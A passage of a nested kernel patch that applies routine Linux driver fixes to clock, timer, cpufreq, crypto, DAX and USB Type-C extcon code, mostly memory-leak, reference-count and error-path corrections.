++	.ops = &clk_rcg2_shared_ops,
+ };
+ 
+ static struct clk_rcg2 gcc_qupv3_wrap0_s5_clk_src = {
+@@ -1219,7 +1219,7 @@ static struct clk_rcg2 gcc_sdcc1_ice_core_clk_src = {
+ 		.name = "gcc_sdcc1_ice_core_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1266,7 +1266,7 @@ static struct clk_rcg2 gcc_usb30_prim_master_clk_src = {
+ 		.name = "gcc_usb30_prim_master_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1280,7 +1280,7 @@ static struct clk_rcg2 gcc_usb3_prim_phy_aux_clk_src = {
+ 		.name = "gcc_usb3_prim_phy_aux_clk_src",
+ 		.parent_data = gcc_parents_13,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_13),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1303,7 +1303,7 @@ static struct clk_rcg2 gcc_video_venus_clk_src = {
+ 		.parent_data = gcc_parents_14,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_14),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+diff --git a/drivers/clk/qcom/mmcc-msm8974.c b/drivers/clk/qcom/mmcc-msm8974.c
+index f74662925a582..17ed52046170a 100644
+--- a/drivers/clk/qcom/mmcc-msm8974.c
++++ b/drivers/clk/qcom/mmcc-msm8974.c
+@@ -473,7 +473,7 @@ static struct clk_rcg2 mdp_clk_src = {
+ 		.name = "mdp_clk_src",
+ 		.parent_names = mmcc_xo_mmpll0_dsi_hdmi_gpll0,
+ 		.num_parents = 6,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -2192,23 +2192,6 @@ static struct clk_branch ocmemcx_ocmemnoc_clk = {
+ 	},
+ };
+ 
+-static struct clk_branch oxili_ocmemgx_clk = {
+-	.halt_reg = 0x402c,
+-	.clkr = {
+-		.enable_reg = 0x402c,
+-		.enable_mask = BIT(0),
+-		.hw.init = &(struct clk_init_data){
+-			.name = "oxili_ocmemgx_clk",
+-			.parent_names = (const char *[]){
+-				"gfx3d_clk_src",
+-			},
+-			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT,
+-			.ops = &clk_branch2_ops,
+-		},
+-	},
+-};
+-
+ static struct clk_branch ocmemnoc_clk = {
+ 	.halt_reg = 0x50b4,
+ 	.clkr = {
+@@ -2389,7 +2372,7 @@ static struct gdsc mdss_gdsc = {
+ 	.pd = {
+ 		.name = "mdss",
+ 	},
+-	.pwrsts = PWRSTS_RET_ON,
++	.pwrsts = PWRSTS_OFF_ON,
+ };
+ 
+ static struct gdsc camss_jpeg_gdsc = {
+@@ -2500,7 +2483,6 @@ static struct clk_regmap *mmcc_msm8226_clocks[] = {
+ 	[MMSS_MMSSNOC_AXI_CLK] = &mmss_mmssnoc_axi_clk.clkr,
+ 	[MMSS_S0_AXI_CLK] = &mmss_s0_axi_clk.clkr,
+ 	[OCMEMCX_AHB_CLK] = &ocmemcx_ahb_clk.clkr,
+-	[OXILI_OCMEMGX_CLK] = &oxili_ocmemgx_clk.clkr,
+ 	[OXILI_GFX3D_CLK] = &oxili_gfx3d_clk.clkr,
+ 	[OXILICX_AHB_CLK] = &oxilicx_ahb_clk.clkr,
+ 	[OXILICX_AXI_CLK] = &oxilicx_axi_clk.clkr,
+@@ -2658,7 +2640,6 @@ static struct clk_regmap *mmcc_msm8974_clocks[] = {
+ 	[MMSS_S0_AXI_CLK] = &mmss_s0_axi_clk.clkr,
+ 	[OCMEMCX_AHB_CLK] = &ocmemcx_ahb_clk.clkr,
+ 	[OCMEMCX_OCMEMNOC_CLK] = &ocmemcx_ocmemnoc_clk.clkr,
+-	[OXILI_OCMEMGX_CLK] = &oxili_ocmemgx_clk.clkr,
+ 	[OCMEMNOC_CLK] = &ocmemnoc_clk.clkr,
+ 	[OXILI_GFX3D_CLK] = &oxili_gfx3d_clk.clkr,
+ 	[OXILICX_AHB_CLK] = &oxilicx_ahb_clk.clkr,
+diff --git a/drivers/clk/qcom/reset.c b/drivers/clk/qcom/reset.c
+index 2a16adb572d2b..0e914ec7aeae1 100644
+--- a/drivers/clk/qcom/reset.c
++++ b/drivers/clk/qcom/reset.c
+@@ -30,7 +30,7 @@ qcom_reset_assert(struct reset_controller_dev *rcdev, unsigned long id)
+ 
+ 	rst = to_qcom_reset_controller(rcdev);
+ 	map = &rst->reset_map[id];
+-	mask = BIT(map->bit);
++	mask = map->bitmask ? map->bitmask : BIT(map->bit);
+ 
+ 	return regmap_update_bits(rst->regmap, map->reg, mask, mask);
+ }
+@@ -44,7 +44,7 @@ qcom_reset_deassert(struct reset_controller_dev *rcdev, unsigned long id)
+ 
+ 	rst = to_qcom_reset_controller(rcdev);
+ 	map = &rst->reset_map[id];
+-	mask = BIT(map->bit);
++	mask = map->bitmask ? map->bitmask : BIT(map->bit);
+ 
+ 	return regmap_update_bits(rst->regmap, map->reg, mask, 0);
+ }
+diff --git a/drivers/clk/qcom/reset.h b/drivers/clk/qcom/reset.h
+index b8c113582072b..9a47c838d9b1b 100644
+--- a/drivers/clk/qcom/reset.h
++++ b/drivers/clk/qcom/reset.h
+@@ -12,6 +12,7 @@ struct qcom_reset_map {
+ 	unsigned int reg;
+ 	u8 bit;
+ 	u8 udelay;
++	u32 bitmask;
+ };
+ 
+ struct regmap;
+diff --git a/drivers/clk/renesas/rzg2l-cpg.c b/drivers/clk/renesas/rzg2l-cpg.c
+index 3ff6ecd617565..2c877576c5729 100644
+--- a/drivers/clk/renesas/rzg2l-cpg.c
++++ b/drivers/clk/renesas/rzg2l-cpg.c
+@@ -600,10 +600,8 @@ static int rzg2l_cpg_sipll5_set_rate(struct clk_hw *hw,
+ 	}
+ 
+ 	/* Output clock setting 1 */
+-	writel(CPG_SIPLL5_CLK1_POSTDIV1_WEN | CPG_SIPLL5_CLK1_POSTDIV2_WEN |
+-	       CPG_SIPLL5_CLK1_REFDIV_WEN  | (params.pl5_postdiv1 << 0) |
+-	       (params.pl5_postdiv2 << 4) | (params.pl5_refdiv << 8),
+-	       priv->base + CPG_SIPLL5_CLK1);
++	writel((params.pl5_postdiv1 << 0) | (params.pl5_postdiv2 << 4) |
++	       (params.pl5_refdiv << 8), priv->base + CPG_SIPLL5_CLK1);
+ 
+ 	/* Output clock setting, SSCG modulation value setting 3 */
+ 	writel((params.pl5_fracin << 8), priv->base + CPG_SIPLL5_CLK3);
+diff --git a/drivers/clk/renesas/rzg2l-cpg.h b/drivers/clk/renesas/rzg2l-cpg.h
+index cecbdf5e4f93a..b33a3e79161b6 100644
+--- a/drivers/clk/renesas/rzg2l-cpg.h
++++ b/drivers/clk/renesas/rzg2l-cpg.h
+@@ -32,9 +32,6 @@
+ #define CPG_SIPLL5_STBY_RESETB_WEN	BIT(16)
+ #define CPG_SIPLL5_STBY_SSCG_EN_WEN	BIT(18)
+ #define CPG_SIPLL5_STBY_DOWNSPREAD_WEN	BIT(20)
+-#define CPG_SIPLL5_CLK1_POSTDIV1_WEN	BIT(16)
+-#define CPG_SIPLL5_CLK1_POSTDIV2_WEN	BIT(20)
+-#define CPG_SIPLL5_CLK1_REFDIV_WEN	BIT(24)
+ #define CPG_SIPLL5_CLK4_RESV_LSB	(0xFF)
+ #define CPG_SIPLL5_MON_PLL5_LOCK	BIT(4)
+ 
+diff --git a/drivers/clk/tegra/clk-tegra124-emc.c b/drivers/clk/tegra/clk-tegra124-emc.c
+index 219c80653dbdb..2a6db04342815 100644
+--- a/drivers/clk/tegra/clk-tegra124-emc.c
++++ b/drivers/clk/tegra/clk-tegra124-emc.c
+@@ -464,6 +464,7 @@ static int load_timings_from_dt(struct tegra_clk_emc *tegra,
+ 		err = load_one_timing_from_dt(tegra, timing, child);
+ 		if (err) {
+ 			of_node_put(child);
++			kfree(tegra->timings);
+ 			return err;
+ 		}
+ 
+@@ -515,6 +516,7 @@ struct clk *tegra124_clk_register_emc(void __iomem *base, struct device_node *np
+ 		err = load_timings_from_dt(tegra, node, node_ram_code);
+ 		if (err) {
+ 			of_node_put(node);
++			kfree(tegra);
+ 			return ERR_PTR(err);
+ 		}
+ 	}
+diff --git a/drivers/clk/ti/clkctrl.c b/drivers/clk/ti/clkctrl.c
+index ae58628794176..57611bfb299c1 100644
+--- a/drivers/clk/ti/clkctrl.c
++++ b/drivers/clk/ti/clkctrl.c
+@@ -258,6 +258,9 @@ static const char * __init clkctrl_get_clock_name(struct device_node *np,
+ 	if (clkctrl_name && !legacy_naming) {
+ 		clock_name = kasprintf(GFP_KERNEL, "%s-clkctrl:%04x:%d",
+ 				       clkctrl_name, offset, index);
++		if (!clock_name)
++			return NULL;
++
+ 		strreplace(clock_name, '_', '-');
+ 
+ 		return clock_name;
+@@ -586,6 +589,10 @@ static void __init _ti_omap4_clkctrl_setup(struct device_node *node)
+ 	if (clkctrl_name) {
+ 		provider->clkdm_name = kasprintf(GFP_KERNEL,
+ 						 "%s_clkdm", clkctrl_name);
++		if (!provider->clkdm_name) {
++			kfree(provider);
++			return;
++		}
+ 		goto clkdm_found;
+ 	}
+ 
+diff --git a/drivers/clk/xilinx/clk-xlnx-clock-wizard.c b/drivers/clk/xilinx/clk-xlnx-clock-wizard.c
+index eb1dfe7ecc1b4..4a23583933bcc 100644
+--- a/drivers/clk/xilinx/clk-xlnx-clock-wizard.c
++++ b/drivers/clk/xilinx/clk-xlnx-clock-wizard.c
+@@ -354,7 +354,7 @@ static struct clk *clk_wzrd_register_divider(struct device *dev,
+ 	hw = &div->hw;
+ 	ret = devm_clk_hw_register(dev, hw);
+ 	if (ret)
+-		hw = ERR_PTR(ret);
++		return ERR_PTR(ret);
+ 
+ 	return hw->clk;
+ }
+diff --git a/drivers/clocksource/timer-cadence-ttc.c b/drivers/clocksource/timer-cadence-ttc.c
+index 4efd0cf3b602d..0d52e28fea4de 100644
+--- a/drivers/clocksource/timer-cadence-ttc.c
++++ b/drivers/clocksource/timer-cadence-ttc.c
+@@ -486,10 +486,10 @@ static int __init ttc_timer_probe(struct platform_device *pdev)
+ 	 * and use it. Note that the event timer uses the interrupt and it's the
+ 	 * 2nd TTC hence the irq_of_parse_and_map(,1)
+ 	 */
+-	timer_baseaddr = of_iomap(timer, 0);
+-	if (!timer_baseaddr) {
++	timer_baseaddr = devm_of_iomap(&pdev->dev, timer, 0, NULL);
++	if (IS_ERR(timer_baseaddr)) {
+ 		pr_err("ERROR: invalid timer base address\n");
+-		return -ENXIO;
++		return PTR_ERR(timer_baseaddr);
+ 	}
+ 
+ 	irq = irq_of_parse_and_map(timer, 1);
+@@ -513,20 +513,27 @@ static int __init ttc_timer_probe(struct platform_device *pdev)
+ 	clk_ce = of_clk_get(timer, clksel);
+ 	if (IS_ERR(clk_ce)) {
+ 		pr_err("ERROR: timer input clock not found\n");
+-		return PTR_ERR(clk_ce);
++		ret = PTR_ERR(clk_ce);
++		goto put_clk_cs;
+ 	}
+ 
+ 	ret = ttc_setup_clocksource(clk_cs, timer_baseaddr, timer_width);
+ 	if (ret)
+-		return ret;
++		goto put_clk_ce;
+ 
+ 	ret = ttc_setup_clockevent(clk_ce, timer_baseaddr + 4, irq);
+ 	if (ret)
+-		return ret;
++		goto put_clk_ce;
+ 
+ 	pr_info("%pOFn #0 at %p, irq=%d\n", timer, timer_baseaddr, irq);
+ 
+ 	return 0;
++
++put_clk_ce:
++	clk_put(clk_ce);
++put_clk_cs:
++	clk_put(clk_cs);
++	return ret;
+ }
+ 
+ static const struct of_device_id ttc_timer_of_match[] = {
+diff --git a/drivers/cpufreq/intel_pstate.c b/drivers/cpufreq/intel_pstate.c
+index 6ff73c30769fa..818eb2503cdd5 100644
+--- a/drivers/cpufreq/intel_pstate.c
++++ b/drivers/cpufreq/intel_pstate.c
+@@ -837,6 +837,8 @@ static ssize_t store_energy_performance_preference(
+ 			err = cpufreq_start_governor(policy);
+ 			if (!ret)
+ 				ret = err;
++		} else {
++			ret = 0;
+ 		}
+ 	}
+ 
+diff --git a/drivers/cpufreq/mediatek-cpufreq.c b/drivers/cpufreq/mediatek-cpufreq.c
+index 9a39a7ccfae96..fef68cb2b38f7 100644
+--- a/drivers/cpufreq/mediatek-cpufreq.c
++++ b/drivers/cpufreq/mediatek-cpufreq.c
+@@ -696,9 +696,16 @@ static const struct mtk_cpufreq_platform_data mt2701_platform_data = {
+ static const struct mtk_cpufreq_platform_data mt7622_platform_data = {
+ 	.min_volt_shift = 100000,
+ 	.max_volt_shift = 200000,
+-	.proc_max_volt = 1360000,
++	.proc_max_volt = 1350000,
+ 	.sram_min_volt = 0,
+-	.sram_max_volt = 1360000,
++	.sram_max_volt = 1350000,
++	.ccifreq_supported = false,
++};
++
++static const struct mtk_cpufreq_platform_data mt7623_platform_data = {
++	.min_volt_shift = 100000,
++	.max_volt_shift = 200000,
++	.proc_max_volt = 1300000,
+ 	.ccifreq_supported = false,
+ };
+ 
+@@ -734,7 +741,7 @@ static const struct of_device_id mtk_cpufreq_machines[] __initconst = {
+ 	{ .compatible = "mediatek,mt2701", .data = &mt2701_platform_data },
+ 	{ .compatible = "mediatek,mt2712", .data = &mt2701_platform_data },
+ 	{ .compatible = "mediatek,mt7622", .data = &mt7622_platform_data },
+-	{ .compatible = "mediatek,mt7623", .data = &mt7622_platform_data },
++	{ .compatible = "mediatek,mt7623", .data = &mt7623_platform_data },
+ 	{ .compatible = "mediatek,mt8167", .data = &mt8516_platform_data },
+ 	{ .compatible = "mediatek,mt817x", .data = &mt2701_platform_data },
+ 	{ .compatible = "mediatek,mt8173", .data = &mt2701_platform_data },
+diff --git a/drivers/crypto/marvell/cesa/cipher.c b/drivers/crypto/marvell/cesa/cipher.c
+index c6f2fa753b7c0..0f37dfd42d850 100644
+--- a/drivers/crypto/marvell/cesa/cipher.c
++++ b/drivers/crypto/marvell/cesa/cipher.c
+@@ -297,7 +297,7 @@ static int mv_cesa_des_setkey(struct crypto_skcipher *cipher, const u8 *key,
+ static int mv_cesa_des3_ede_setkey(struct crypto_skcipher *cipher,
+ 				   const u8 *key, unsigned int len)
+ {
+-	struct mv_cesa_des_ctx *ctx = crypto_skcipher_ctx(cipher);
++	struct mv_cesa_des3_ctx *ctx = crypto_skcipher_ctx(cipher);
+ 	int err;
+ 
+ 	err = verify_skcipher_des3_key(cipher, key);
+diff --git a/drivers/crypto/nx/Makefile b/drivers/crypto/nx/Makefile
+index d00181a26dd65..483cef62acee8 100644
+--- a/drivers/crypto/nx/Makefile
++++ b/drivers/crypto/nx/Makefile
+@@ -1,7 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ obj-$(CONFIG_CRYPTO_DEV_NX_ENCRYPT) += nx-crypto.o
+ nx-crypto-objs := nx.o \
+-		  nx_debugfs.o \
+ 		  nx-aes-cbc.o \
+ 		  nx-aes-ecb.o \
+ 		  nx-aes-gcm.o \
+@@ -11,6 +10,7 @@ nx-crypto-objs := nx.o \
+ 		  nx-sha256.o \
+ 		  nx-sha512.o
+ 
++nx-crypto-$(CONFIG_DEBUG_FS) += nx_debugfs.o
+ obj-$(CONFIG_CRYPTO_DEV_NX_COMPRESS_PSERIES) += nx-compress-pseries.o nx-compress.o
+ obj-$(CONFIG_CRYPTO_DEV_NX_COMPRESS_POWERNV) += nx-compress-powernv.o nx-compress.o
+ nx-compress-objs := nx-842.o
+diff --git a/drivers/crypto/nx/nx.h b/drivers/crypto/nx/nx.h
+index c6233173c612e..2697baebb6a35 100644
+--- a/drivers/crypto/nx/nx.h
++++ b/drivers/crypto/nx/nx.h
+@@ -170,8 +170,8 @@ struct nx_sg *nx_walk_and_build(struct nx_sg *, unsigned int,
+ void nx_debugfs_init(struct nx_crypto_driver *);
+ void nx_debugfs_fini(struct nx_crypto_driver *);
+ #else
+-#define NX_DEBUGFS_INIT(drv)	(0)
+-#define NX_DEBUGFS_FINI(drv)	(0)
++#define NX_DEBUGFS_INIT(drv)	do {} while (0)
++#define NX_DEBUGFS_FINI(drv)	do {} while (0)
+ #endif
+ 
+ #define NX_PAGE_NUM(x)		((u64)(x) & 0xfffffffffffff000ULL)
+diff --git a/drivers/crypto/qat/qat_common/qat_asym_algs.c b/drivers/crypto/qat/qat_common/qat_asym_algs.c
+index 94a26702aeae1..4128200a90329 100644
+--- a/drivers/crypto/qat/qat_common/qat_asym_algs.c
++++ b/drivers/crypto/qat/qat_common/qat_asym_algs.c
+@@ -170,15 +170,14 @@ static void qat_dh_cb(struct icp_qat_fw_pke_resp *resp)
+ 	}
+ 
+ 	areq->dst_len = req->ctx.dh->p_size;
++	dma_unmap_single(dev, req->out.dh.r, req->ctx.dh->p_size,
++			 DMA_FROM_DEVICE);
+ 	if (req->dst_align) {
+ 		scatterwalk_map_and_copy(req->dst_align, areq->dst, 0,
+ 					 areq->dst_len, 1);
+ 		kfree_sensitive(req->dst_align);
+ 	}
+ 
+-	dma_unmap_single(dev, req->out.dh.r, req->ctx.dh->p_size,
+-			 DMA_FROM_DEVICE);
+-
+ 	dma_unmap_single(dev, req->phy_in, sizeof(struct qat_dh_input_params),
+ 			 DMA_TO_DEVICE);
+ 	dma_unmap_single(dev, req->phy_out,
+@@ -494,6 +493,8 @@ static int qat_dh_init_tfm(struct crypto_kpp *tfm)
+ 	if (!inst)
+ 		return -EINVAL;
+ 
++	kpp_set_reqsize(tfm, sizeof(struct qat_asym_request) + 64);
++
+ 	ctx->p_size = 0;
+ 	ctx->g2 = false;
+ 	ctx->inst = inst;
+@@ -519,12 +520,14 @@ static void qat_rsa_cb(struct icp_qat_fw_pke_resp *resp)
+ 
+ 	err = (err == ICP_QAT_FW_COMN_STATUS_FLAG_OK) ? 0 : -EINVAL;
+ 
+-	kfree_sensitive(req->src_align);
+-
+ 	dma_unmap_single(dev, req->in.rsa.enc.m, req->ctx.rsa->key_sz,
+ 			 DMA_TO_DEVICE);
+ 
++	kfree_sensitive(req->src_align);
++
+ 	areq->dst_len = req->ctx.rsa->key_sz;
++	dma_unmap_single(dev, req->out.rsa.enc.c, req->ctx.rsa->key_sz,
++			 DMA_FROM_DEVICE);
+ 	if (req->dst_align) {
+ 		scatterwalk_map_and_copy(req->dst_align, areq->dst, 0,
+ 					 areq->dst_len, 1);
+@@ -532,9 +535,6 @@ static void qat_rsa_cb(struct icp_qat_fw_pke_resp *resp)
+ 		kfree_sensitive(req->dst_align);
+ 	}
+ 
+-	dma_unmap_single(dev, req->out.rsa.enc.c, req->ctx.rsa->key_sz,
+-			 DMA_FROM_DEVICE);
+-
+ 	dma_unmap_single(dev, req->phy_in, sizeof(struct qat_rsa_input_params),
+ 			 DMA_TO_DEVICE);
+ 	dma_unmap_single(dev, req->phy_out,
+@@ -1230,6 +1230,8 @@ static int qat_rsa_init_tfm(struct crypto_akcipher *tfm)
+ 	if (!inst)
+ 		return -EINVAL;
+ 
++	akcipher_set_reqsize(tfm, sizeof(struct qat_asym_request) + 64);
++
+ 	ctx->key_sz = 0;
+ 	ctx->inst = inst;
+ 	return 0;
+@@ -1252,7 +1254,6 @@ static struct akcipher_alg rsa = {
+ 	.max_size = qat_rsa_max_size,
+ 	.init = qat_rsa_init_tfm,
+ 	.exit = qat_rsa_exit_tfm,
+-	.reqsize = sizeof(struct qat_asym_request) + 64,
+ 	.base = {
+ 		.cra_name = "rsa",
+ 		.cra_driver_name = "qat-rsa",
+@@ -1269,7 +1270,6 @@ static struct kpp_alg dh = {
+ 	.max_size = qat_dh_max_size,
+ 	.init = qat_dh_init_tfm,
+ 	.exit = qat_dh_exit_tfm,
+-	.reqsize = sizeof(struct qat_asym_request) + 64,
+ 	.base = {
+ 		.cra_name = "dh",
+ 		.cra_driver_name = "qat-dh",
+diff --git a/drivers/dax/bus.c b/drivers/dax/bus.c
+index c64e7076537cb..3a9348c7f7289 100644
+--- a/drivers/dax/bus.c
++++ b/drivers/dax/bus.c
+@@ -432,18 +432,34 @@ static void unregister_dev_dax(void *dev)
+ 	put_device(dev);
+ }
+ 
++static void dax_region_free(struct kref *kref)
++{
++	struct dax_region *dax_region;
++
++	dax_region = container_of(kref, struct dax_region, kref);
++	kfree(dax_region);
++}
++
++void dax_region_put(struct dax_region *dax_region)
++{
++	kref_put(&dax_region->kref, dax_region_free);
++}
++EXPORT_SYMBOL_GPL(dax_region_put);
++
+ /* a return value >= 0 indicates this invocation invalidated the id */
+ static int __free_dev_dax_id(struct dev_dax *dev_dax)
+ {
+-	struct dax_region *dax_region = dev_dax->region;
+ 	struct device *dev = &dev_dax->dev;
++	struct dax_region *dax_region;
+ 	int rc = dev_dax->id;
+ 
+ 	device_lock_assert(dev);
+ 
+-	if (is_static(dax_region) || dev_dax->id < 0)
++	if (!dev_dax->dyn_id || dev_dax->id < 0)
+ 		return -1;
++	dax_region = dev_dax->region;
+ 	ida_free(&dax_region->ida, dev_dax->id);
++	dax_region_put(dax_region);
+ 	dev_dax->id = -1;
+ 	return rc;
+ }
+@@ -459,6 +475,20 @@ static int free_dev_dax_id(struct dev_dax *dev_dax)
+ 	return rc;
+ }
+ 
++static int alloc_dev_dax_id(struct dev_dax *dev_dax)
++{
++	struct dax_region *dax_region = dev_dax->region;
++	int id;
++
++	id = ida_alloc(&dax_region->ida, GFP_KERNEL);
++	if (id < 0)
++		return id;
++	kref_get(&dax_region->kref);
++	dev_dax->dyn_id = true;
++	dev_dax->id = id;
++	return id;
++}
++
+ static ssize_t delete_store(struct device *dev, struct device_attribute *attr,
+ 		const char *buf, size_t len)
+ {
+@@ -546,20 +576,6 @@ static const struct attribute_group *dax_region_attribute_groups[] = {
+ 	NULL,
+ };
+ 
+-static void dax_region_free(struct kref *kref)
+-{
+-	struct dax_region *dax_region;
+-
+-	dax_region = container_of(kref, struct dax_region, kref);
+-	kfree(dax_region);
+-}
+-
+-void dax_region_put(struct dax_region *dax_region)
+-{
+-	kref_put(&dax_region->kref, dax_region_free);
+-}
+-EXPORT_SYMBOL_GPL(dax_region_put);
+-
+ static void dax_region_unregister(void *region)
+ {
+ 	struct dax_region *dax_region = region;
+@@ -621,10 +637,12 @@ EXPORT_SYMBOL_GPL(alloc_dax_region);
+ static void dax_mapping_release(struct device *dev)
+ {
+ 	struct dax_mapping *mapping = to_dax_mapping(dev);
+-	struct dev_dax *dev_dax = to_dev_dax(dev->parent);
++	struct device *parent = dev->parent;
++	struct dev_dax *dev_dax = to_dev_dax(parent);
+ 
+ 	ida_free(&dev_dax->ida, mapping->id);
+ 	kfree(mapping);
++	put_device(parent);
+ }
+ 
+ static void unregister_dax_mapping(void *data)
+@@ -764,6 +782,7 @@ static int devm_register_dax_mapping(struct dev_dax *dev_dax, int range_id)
+ 	dev = &mapping->dev;
+ 	device_initialize(dev);
+ 	dev->parent = &dev_dax->dev;
++	get_device(dev->parent);
+ 	dev->type = &dax_mapping_type;
+ 	dev_set_name(dev, "mapping%d", mapping->id);
+ 	rc = device_add(dev);
+@@ -1281,12 +1300,10 @@ static const struct attribute_group *dax_attribute_groups[] = {
+ static void dev_dax_release(struct device *dev)
+ {
+ 	struct dev_dax *dev_dax = to_dev_dax(dev);
+-	struct dax_region *dax_region = dev_dax->region;
+ 	struct dax_device *dax_dev = dev_dax->dax_dev;
+ 
+ 	put_dax(dax_dev);
+ 	free_dev_dax_id(dev_dax);
+-	dax_region_put(dax_region);
+ 	kfree(dev_dax->pgmap);
+ 	kfree(dev_dax);
+ }
+@@ -1310,6 +1327,7 @@ struct dev_dax *devm_create_dev_dax(struct dev_dax_data *data)
+ 	if (!dev_dax)
+ 		return ERR_PTR(-ENOMEM);
+ 
++	dev_dax->region = dax_region;
+ 	if (is_static(dax_region)) {
+ 		if (dev_WARN_ONCE(parent, data->id < 0,
+ 				"dynamic id specified to static region\n")) {
+@@ -1325,13 +1343,11 @@ struct dev_dax *devm_create_dev_dax(struct dev_dax_data *data)
+ 			goto err_id;
+ 		}
+ 
+-		rc = ida_alloc(&dax_region->ida, GFP_KERNEL);
++		rc = alloc_dev_dax_id(dev_dax);
+ 		if (rc < 0)
+ 			goto err_id;
+-		dev_dax->id = rc;
+ 	}
+ 
+-	dev_dax->region = dax_region;
+ 	dev = &dev_dax->dev;
+ 	device_initialize(dev);
+ 	dev_set_name(dev, "dax%d.%d", dax_region->id, dev_dax->id);
+@@ -1372,7 +1388,6 @@ struct dev_dax *devm_create_dev_dax(struct dev_dax_data *data)
+ 	dev_dax->target_node = dax_region->target_node;
+ 	dev_dax->align = dax_region->align;
+ 	ida_init(&dev_dax->ida);
+-	kref_get(&dax_region->kref);
+ 
+ 	inode = dax_inode(dax_dev);
+ 	dev->devt = inode->i_rdev;
+diff --git a/drivers/dax/dax-private.h b/drivers/dax/dax-private.h
+index 1c974b7caae6e..afcada6fd2eda 100644
+--- a/drivers/dax/dax-private.h
++++ b/drivers/dax/dax-private.h
+@@ -52,7 +52,8 @@ struct dax_mapping {
+  * @region - parent region
+  * @dax_dev - core dax functionality
+  * @target_node: effective numa node if dev_dax memory range is onlined
+- * @id: ida allocated id
++ * @dyn_id: is this a dynamic or statically created instance
++ * @id: ida allocated id when the dax_region is not static
+  * @ida: mapping id allocator
+  * @dev - device core
+  * @pgmap - pgmap for memmap setup / lifetime (driver owned)
+@@ -64,6 +65,7 @@ struct dev_dax {
+ 	struct dax_device *dax_dev;
+ 	unsigned int align;
+ 	int target_node;
++	bool dyn_id;
+ 	int id;
+ 	struct ida ida;
+ 	struct device dev;
+diff --git a/drivers/dax/kmem.c b/drivers/dax/kmem.c
+index 4aa758a2b3d1b..1a33616ceb06e 100644
+--- a/drivers/dax/kmem.c
++++ b/drivers/dax/kmem.c
+@@ -99,7 +99,7 @@ static int dev_dax_kmem_probe(struct dev_dax *dev_dax)
+ 	if (!data->res_name)
+ 		goto err_res_name;
+ 
+-	rc = memory_group_register_static(numa_node, total_len);
++	rc = memory_group_register_static(numa_node, PFN_UP(total_len));
+ 	if (rc < 0)
+ 		goto err_reg_mgid;
+ 	data->mgid = rc;
+diff --git a/drivers/extcon/extcon-usbc-tusb320.c b/drivers/extcon/extcon-usbc-tusb320.c
+index 9dfa545427ca1..10dff1c512c41 100644
+--- a/drivers/extcon/extcon-usbc-tusb320.c
++++ b/drivers/extcon/extcon-usbc-tusb320.c
+@@ -78,6 +78,7 @@ struct tusb320_priv {
+ 	struct typec_capability	cap;
+ 	enum typec_port_type port_type;
+ 	enum typec_pwr_opmode pwr_opmode;
++	struct fwnode_handle *connector_fwnode;
+ };
+ 
+ static const char * const tusb_attached_states[] = {
+@@ -391,27 +392,25 @@ static int tusb320_typec_probe(struct i2c_client *client,
+ 	/* Type-C connector found. */
+ 	ret = typec_get_fw_cap(&priv->cap, connector);
+ 	if (ret)
+-		return ret;
++		goto err_put;
+ 
+ 	priv->port_type = priv->cap.type;
+ 
+ 	/* This goes into register 0x8 field CURRENT_MODE_ADVERTISE */
+ 	ret = fwnode_property_read_string(connector, "typec-power-opmode", &cap_str);
+ 	if (ret)
+-		return ret;
++		goto err_put;
+ 
+ 	ret = typec_find_pwr_opmode(cap_str);
+ 	if (ret < 0)
+-		return ret;
+-	if (ret == TYPEC_PWR_MODE_PD)
+-		return -EINVAL;
++		goto err_put;
+ 
+ 	priv->pwr_opmode = ret;
+ 
+ 	/* Initialize the hardware with the devicetree settings. */
+ 	ret = tusb320_set_adv_pwr_mode(priv);
+ 	if (ret)
+-		return ret;
++		goto err_put;
+ 
+ 	priv->cap.revision		= USB_TYPEC_REV_1_1;
+ 	priv->cap.accessory[0]		= TYPEC_ACCESSORY_AUDIO;
+@@ -422,14 +421,28 @@ static int tusb320_typec_probe(struct i2c_client *client,
+ 	priv->cap.fwnode		= connector;
+ 
+ 	priv->port = typec_register_port(&client->dev, &priv->cap);
+-	if (IS_ERR(priv->port))
+-		return PTR_ERR(priv->port);
++	if (IS_ERR(priv->port)) {
++		ret = PTR_ERR(priv->port);
++		goto err_put;
++	}
++
++	priv->connector_fwnode = connector;
+ 
+ 	return 0;
++
++err_put:
++	fwnode_handle_put(connector);
++
++	return ret;
+ }
+ 
+-static int tusb320_probe(struct i2c_client *client,
+-			 const struct i2c_device_id *id)
++static void tusb320_typec_remove(struct tusb320_priv *priv)
++{
++	typec_unregister_port(priv->port);
++	fwnode_handle_put(priv->connector_fwnode);
++}
++
++static int tusb320_probe(struct i2c_client *client)
+ {
+ 	struct tusb320_priv *priv;
+ 	const void *match_data;
+@@ -439,7 +452,9 @@ static int tusb320_probe(struct i2c_client *client,
+ 	priv = devm_kzalloc(&client->dev, sizeof(*priv), GFP_KERNEL);
+ 	if (!priv)
+ 		return -ENOMEM;
++
+ 	priv->dev = &client->dev;
++	i2c_set_clientdata(client, priv);
+ 
+ 	priv->regmap = devm_regmap_init_i2c(client, &tusb320_regmap_config);
+ 	if (IS_ERR(priv->regmap))
+@@ -490,10 +505,19 @@ static int tusb320_probe(struct i2c_client *client,
+ 					tusb320_irq_handler,
+ 					IRQF_TRIGGER_FALLING | IRQF_ONESHOT,
+ 					client->name, priv);
++	if (ret)
++		tusb320_typec_remove(priv);
+ 
+ 	return ret;
+ }
+ 
++static void tusb320_remove(struct i2c_client *client)
++{
++	struct tusb320_priv *priv = i2c_get_clientdata(client);
++
++	tusb320_typec_remove(priv);
++}
++
